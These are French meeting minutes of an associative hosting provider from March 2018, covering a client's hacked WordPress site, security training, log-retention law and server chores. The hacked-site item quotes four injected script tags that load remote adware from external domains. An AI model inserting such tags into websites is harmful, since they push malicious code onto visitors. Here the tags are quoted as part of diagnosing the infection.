2017-10 Mardi Globenet octobre 2017
Mardi Globenet du 10 octobre 2017
2017-11 Mardi Globenet novembre 2017
Mardi Globenet du 14 novembre 2017
2017-12 Mardi Globenet décembre 2017
Mardi Globenet du 12 Décembre 2017
2018-01 Mardi Globenet janvier 2018
Mardi Globenet du 9 janvier 2018
2018-02 Mardi Globenet février 2018
Mardi Globenet du 13 février 2018
2018-03 Mardi Globenet mars 2018
Mardi Globenet du 13 mars 2018
2018-03 Mardi Globenet mars 2018
Mardi Globenet du 13 mars 2018

présent-es

ODJ

malware site web ?

Un hébergé nous a contacté suite à des messages de visiteurs qui se plaignent de popups publicitaires agressifs lors de la visite de son site web. Ces pages n’apparaissent pas pour toutes les visites.

Après discussion et analyse en réunion, on a bien la confirmation que le site web est compromis.

Quoi faire : mettre à jour - il y a de fortes chances que ça ne suffise pas. il faudrait faire le ménage mais ça semble être une grosse tache.

Par exemple ligne 804 de la page wp/index.php :

<script type="text/javascript" src="//go.oclaserver.com/apu.php?zoneid=1476266"></script>
<script src="//go.mobtrks.com/notice.php?p=1537586&interstitial=1"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1476269&interactive=1&pushup=1"></script>
<script src="//defpush.com/ntfc.php?p=1567903" data-cfasync="false" async></script>

Ce sont des référence à des bouts de codes qui vont récupérer de la pub.

Au niveau du serveur, le répertoire wordpress est une inclusion dans un répertoire SPIP qui est aussi actif (sans savoir si ce SPIP est aussi vérolé).

formation échanges et partenariats

L’association échanges et partenariats nous a contacté pour demander une intervention sur la sécurité numérique auprès de bénévoles qui partiront en mission. Le périmètre de l’intervention est en discussion et devrait se faire le 12 avril 2018.

retour OLN

Dans les locaux de la quadrature, discussion de stratégies communes sur la question des libertés sur Internet.

Questions sur les durées de rétention des logs

Une fiche juridique est en cours d’élaboration par la quadrature et la FFDN sur le cadre juridique lié à l’hébergement, notamment la rétention des données de journalisation (logs).

L’idée est lancée de participer à un événement autour de la mise en place du RGPD le 25 mai 2018.

La Quadrature a déjà diffusé un guide juridique à l’attention des structures qui donnent un libre accès à Internet.

On retiendra du document que :

mais que cependant :

et conclue qu’il est recommandé aux organisations d’appliquer le droit européen.

Problématique des nouvelles boîtes noires de l’ANSSI

Il semble clair que l’ANSSI veut faire du DPI. La quadrature a un point de vue, la FFDN n’en a pas pour l’instant.

Lire Du deep packet inspection dans le projet de loi de programmation militaire 2019-2025

Adminsys

certificats à renouveler

Jacques s’occupe de la mise en place des certif no-log Jon, WhilelM et Emile pour Globenet.

webmail squirrelmail - porter la taille des pièces jointes à 5Mo

consensus pour monter à 5Mo intérêt pour argumenter les raisons de ne pas monter la taille des pièces.

Accès OOB (Out-Of-Band) Gitoyen ?

Il faut encore demander à Ielo-Liazo s’il est possible d’avoir un câble en cuivre entre la baie de Globenet et celle où est Gitoyen. L’autre solution d’utiliser un lien fibre est vraiment à éviter (on ne veut pas brancher le serveur de consoles sur un switch ou un convertisseur de média).

DNS primaire dns.sudeducation.org

Bougé vers la nouvelle infrastructure, la configuration du secondaire (karl.globenet.org) a été mise à jour en coordination.